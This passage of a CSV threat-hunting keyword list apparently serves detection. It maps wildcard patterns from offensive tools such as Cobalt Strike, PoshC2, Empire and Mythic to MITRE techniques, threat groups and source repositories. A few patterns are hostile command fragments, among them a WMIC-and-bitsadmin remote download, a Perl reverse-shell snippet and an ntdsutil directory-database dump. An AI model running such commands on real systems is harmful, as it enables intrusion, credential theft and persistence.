Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*start stinger ","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*start wmic /node:@C:\*.txt /user:*/password:* process call create *cmd.exe /c bitsadmin /transfer *.exe *","greyware_tool_keyword","wmic","WMIC suspicious transfer ","T1105 - T1041 - T1048","TA0002 - TA0003 - TA0010","N/A","N/A","Exploitation Tools","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*start_mythic_server.sh*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*start_nbnsspoof*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Start-ACLsAnalysis -Domain*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*startanotherimplant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-CaptureServer.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*startdaisy*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-domainACLsAnalysis*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*starting Multi-Layered ACLight scan*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*-start-keylogger*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"*start-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*start-keystrokes-writefile*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Start-MonitorTCPConnections.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*start-process ntdsutil.exe *create full**","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*StartProcessFake(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" +"*Start-PSAmsiClient.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Start-PSAmsiServer.ps1*","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" +"*Start-TCPMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Start-MonitorTCPConnections.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*startupfolderperistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*Start-WebServer.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*StartWebServiceBeacon*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*static_syscalls_apc_spawn *","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","0","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*static_syscalls_apc_spawn*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*static_syscalls_dump*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*statistically-likely-usernames*","offensive_tool_keyword","statistically-likely-usernames","This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/insidetrust/statistically-likely-usernames","1","1","N/A","N/A","7","699","112","2022-08-31T20:27:53Z","2016-02-14T23:24:39Z" +"*StayKit.cna*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.cna*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.exe*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*StayKit.git*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*Steal_Pipe_Token /PipeName*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*steal_token *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" +"*steal_token(*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" +"*steal_token.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*steal_token_access_mask*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 